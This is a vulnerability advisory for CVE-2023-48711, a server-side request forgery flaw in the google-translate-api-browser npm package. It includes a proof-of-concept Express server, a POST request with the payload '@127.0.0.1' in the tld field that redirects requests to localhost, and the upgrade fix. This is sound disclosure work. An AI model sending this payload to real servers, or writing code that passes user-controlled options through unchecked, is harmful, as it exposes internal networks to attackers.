CVE-2023-48711
google-translate-api-browser Server-Side Request Forgery (SSRF) Vulnerability
Description
### Summary A Server-Side Request Forgery (SSRF) Vulnerability is present in applications utilizing the `google-translate-api-browser` package and exposing the `translateOptions` to the end user. An attacker can set a malicious `tld`, causing the application to return unsafe URLs pointing towards local resources. ### Details The `translateOptions.tld` field is not properly sanitized before being placed in the Google translate URL. This can allow an attacker with control over the `translateOptions` to set the `tld` to a payload such as `@127.0.0.1`. This causes the full URL to become `https://[email protected]/...`, where `translate.google.` is the username used to connect to localhost. ### PoC Imagine a server running the following code (closely mimicking the code present in the package's README): ```javascript const express = require('express'); const { generateRequestUrl, normaliseResponse } = require('google-translate-api-browser'); const https = require('https'); const app = express(); app.use(express.json()); app.post('/translate', async (req, res) => { const { text, options } = req.body; const url = generateRequestUrl(text, options); https.get(url, (resp) => { let data = ''; resp.on('data', (chunk) => { data += chunk; }); resp.on('end', () => { res.json(normaliseResponse(JSON.parse(data))); }); }).on("error", (err) => { console.log("Error: " + err.message); }); }); const port = 3000; app.listen(port, () => { console.log(`Server is running on port ${port}`); }); ``` An attacker can then send the following POST request to `/translate`: ``` POST /translate HTTP/1.1 Host: localhost:3000 Content-Type: application/json Content-Length: 51 {"text":"Hello","options": {"tld": "@127.0.0.1"} } ``` This will cause a request to be sent to the localhost of the server running the Node application. ### Impact An attacker can send requests within internal networks and the local host. Should any HTTPS application be present on the internal network with a vulnerability exploitable via a GET call, then it would be possible to exploit this using this vulnerability.
How to fix CVE-2023-48711
To remediate CVE-2023-48711, upgrade the affected package to a fixed version below.
- —upgrade to 4.1.0 or later